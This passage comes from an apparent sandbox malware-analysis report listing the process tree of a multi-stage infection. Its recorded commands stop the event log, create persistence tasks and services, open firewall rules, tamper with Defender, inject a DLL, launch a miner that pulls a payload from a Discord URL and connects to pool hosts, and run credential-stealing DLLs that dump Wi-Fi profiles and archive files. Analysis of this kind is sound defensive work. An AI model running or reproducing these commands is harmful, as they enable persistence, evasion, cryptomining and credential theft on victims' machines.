      "C:\Users\Admin\Documents\GuardFox\zsEf6XWGGxzRmnVTKexLrc_e.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:5520
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        
        PID:3720
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        
        PID:2416
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        
        PID:3656
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        
        PID:5144
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OBGPQMHF"
        5⤵
        Launches sc.exe
        
        PID:4352
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:4976
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:5844
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OBGPQMHF"
        5⤵
        Launches sc.exe
        
        PID:5204
  - - C:\Users\Admin\Documents\GuardFox\aEaOLyK0bw44F97bJ3Haks6C.exe
      "C:\Users\Admin\Documents\GuardFox\aEaOLyK0bw44F97bJ3Haks6C.exe"
      4⤵
      Executes dropped EXE
      PID:5652
    - - C:\Users\Admin\AppData\Local\Temp\is-KS5MI.tmp\aEaOLyK0bw44F97bJ3Haks6C.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KS5MI.tmp\aEaOLyK0bw44F97bJ3Haks6C.tmp" /SL5="$90202,1696470,54272,C:\Users\Admin\Documents\GuardFox\aEaOLyK0bw44F97bJ3Haks6C.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6000
      - C:\Users\Admin\AppData\Local\Nuke PHP\nukephp32.exe
        
        "C:\Users\Admin\AppData\Local\Nuke PHP\nukephp32.exe" -i
        6⤵
        Executes dropped EXE
        
        PID:5324
      - C:\Users\Admin\AppData\Local\Nuke PHP\nukephp32.exe
        
        "C:\Users\Admin\AppData\Local\Nuke PHP\nukephp32.exe" -s
        6⤵
        Executes dropped EXE
        
        PID:5584
  - - C:\Users\Admin\Documents\GuardFox\L8hm6kwLATQz6S2fMn4cVyNN.exe
      "C:\Users\Admin\Documents\GuardFox\L8hm6kwLATQz6S2fMn4cVyNN.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:5672
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 740
        5⤵
        Program crash
        
        PID:5368
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 748
        5⤵
        Program crash
        
        PID:5336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 792
        5⤵
        Program crash
        
        PID:5488
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 800
        5⤵
        Program crash
        
        PID:4648
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 960
        5⤵
        Program crash
        
        PID:5392
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 992
        5⤵
        Program crash
        
        PID:5224
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1056
        5⤵
        Program crash
        
        PID:5324
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1392
        5⤵
        Program crash
        
        PID:5132
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "L8hm6kwLATQz6S2fMn4cVyNN.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\L8hm6kwLATQz6S2fMn4cVyNN.exe" & exit
        5⤵
        
        PID:4064
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "L8hm6kwLATQz6S2fMn4cVyNN.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:5304
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1436
        5⤵
        Program crash
        
        PID:4724
  - - C:\Users\Admin\Documents\GuardFox\7KsMJEa7ziqWauV4kdgZCGKn.exe
      "C:\Users\Admin\Documents\GuardFox\7KsMJEa7ziqWauV4kdgZCGKn.exe"
      4⤵
      Executes dropped EXE
      PID:5692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:208
    - - C:\Users\Admin\Documents\GuardFox\7KsMJEa7ziqWauV4kdgZCGKn.exe
        
        "C:\Users\Admin\Documents\GuardFox\7KsMJEa7ziqWauV4kdgZCGKn.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:3656
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5172
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:5292
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:4252
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3376
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5324
  - - C:\Users\Admin\Documents\GuardFox\_sMdS5SXAFvQf2QncmxDg1wN.exe
      "C:\Users\Admin\Documents\GuardFox\_sMdS5SXAFvQf2QncmxDg1wN.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:5704
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EGIJKEHCAK.exe"
        5⤵
        
        PID:5300
      - C:\Users\Admin\AppData\Local\Temp\EGIJKEHCAK.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EGIJKEHCAK.exe"
        6⤵
        Executes dropped EXE
        
        PID:4724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\GuardFox\_sMdS5SXAFvQf2QncmxDg1wN.exe" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:1200
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:2192
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 2304
        5⤵
        Program crash
        
        PID:3608
  - - C:\Users\Admin\Documents\GuardFox\j6ClvmutSN6hUixkjGMixepv.exe
      "C:\Users\Admin\Documents\GuardFox\j6ClvmutSN6hUixkjGMixepv.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Adds Run key to start application
      Checks processor information in registry
      PID:5712
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5036
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:4348
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_2fe3868764b70dafe5d89d79466c63e3\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_2fe3868764b70dafe5d89d79466c63e3 HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5452
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_2fe3868764b70dafe5d89d79466c63e3\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_2fe3868764b70dafe5d89d79466c63e3 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:3928
    - - C:\Users\Admin\AppData\Local\Temp\heidiJ9J5hYp5bAHl\_NHunBZSe8eifB7b8W9h.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidiJ9J5hYp5bAHl\_NHunBZSe8eifB7b8W9h.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5892
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Blocklisted process makes network request
        
        PID:5324
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 1228
        7⤵
        Program crash
        
        PID:4116
  - - C:\Users\Admin\Documents\GuardFox\XHiYShJ8TJf5mNSTLvPK2nyH.exe
      "C:\Users\Admin\Documents\GuardFox\XHiYShJ8TJf5mNSTLvPK2nyH.exe"
      4⤵
      Executes dropped EXE
      PID:5724
  - - C:\Users\Admin\Documents\GuardFox\d83frV2Rj9Wa_Wazpbh4_p98.exe
      "C:\Users\Admin\Documents\GuardFox\d83frV2Rj9Wa_Wazpbh4_p98.exe"
      4⤵
      Executes dropped EXE
      PID:5740
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5356
    - - C:\Users\Admin\Documents\GuardFox\d83frV2Rj9Wa_Wazpbh4_p98.exe
        
        "C:\Users\Admin\Documents\GuardFox\d83frV2Rj9Wa_Wazpbh4_p98.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:2848
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5244
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:3752
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:2052
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1304
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2424
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:4020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5180
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:1600
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5172
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:3508
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        Executes dropped EXE
        
        PID:5344
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:1604
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        Executes dropped EXE
        
        PID:3416
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        Launches sc.exe
        
        PID:2576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        7⤵
        Executes dropped EXE
        
        PID:2532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        7⤵
        Executes dropped EXE
        
        PID:1432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        7⤵
        Executes dropped EXE
        
        PID:752
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:4460
  - - C:\Users\Admin\Documents\GuardFox\2guyqrpGkKfND7jVGbND7CI2.exe
      "C:\Users\Admin\Documents\GuardFox\2guyqrpGkKfND7jVGbND7CI2.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Identifies Wine through registry keys
      Accesses Microsoft Outlook profiles
      Adds Run key to start application
      Checks processor information in registry
      PID:5768
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5784
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:2364
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a85d7ffddf2ee5c09c761a01b187853e\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a85d7ffddf2ee5c09c761a01b187853e HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5304
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a85d7ffddf2ee5c09c761a01b187853e\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a85d7ffddf2ee5c09c761a01b187853e LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:3684
    - - C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\NIyTViq8eDXvz9CBundc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\NIyTViq8eDXvz9CBundc.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        
        PID:3288
      - C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\Tk4gUQCNbR819EceHin_.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\Tk4gUQCNbR819EceHin_.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        
        PID:4736
      - C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\a9p75xZmBYFqxiIiCYhm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\a9p75xZmBYFqxiIiCYhm.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2784
      - C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\gXp1YtBBM6QPr6jEFuGe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\gXp1YtBBM6QPr6jEFuGe.exe"
        6⤵
        Executes dropped EXE
        
        PID:4708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
        7⤵
        
        PID:1684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc142046f8,0x7ffc14204708,0x7ffc14204718
        8⤵
        
        PID:5412
      - C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\gEsNgzNQFG_H09rqJ_UR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi4OabWq8b5jBi\gEsNgzNQFG_H09rqJ_UR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:868
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1224
        8⤵
        Program crash
        
        PID:552
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_7f81c10e3da02ef22b6df12538f807f6\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_7f81c10e3da02ef22b6df12538f807f6 HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5056
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_7f81c10e3da02ef22b6df12538f807f6\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_7f81c10e3da02ef22b6df12538f807f6 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5176
    - - C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\OlRwiKX7EYNxfrbE5a92.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\OlRwiKX7EYNxfrbE5a92.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        
        PID:5844
      - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\1000022001\8c6ea728e2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000022001\8c6ea728e2.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        outlook_office_path
        outlook_win_path
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\N2swwn6Z3Cg1hvjnr7VR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\N2swwn6Z3Cg1hvjnr7VR.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\Myh89dg1k8SeHjUEE0Hq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\Myh89dg1k8SeHjUEE0Hq.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\oHuQIWup1i8YSbvGAEZQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\oHuQIWup1i8YSbvGAEZQ.exe"
        8⤵
        Executes dropped EXE
        
        PID:3360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
        9⤵
        
        PID:3516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc142046f8,0x7ffc14204708,0x7ffc14204718
        10⤵
        
        PID:3764
        
        C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\7hHumx0NIaQCH5Mt1mE9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidiOsrhzCT0bfNj\7hHumx0NIaQCH5Mt1mE9.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        9⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 1248
        10⤵
        Program crash
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
        7⤵
        
        PID:6032
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:6068
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        8⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:6084
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        9⤵
        
        PID:4708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\270530367132_Desktop.zip' -CompressionLevel Optimal
        9⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        7⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:3004
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_c2304190946cb37f941f9c4acb289e9f\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_c2304190946cb37f941f9c4acb289e9f HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:2124
    - - C:\Windows\SysWOW64\schtasks.exe
        
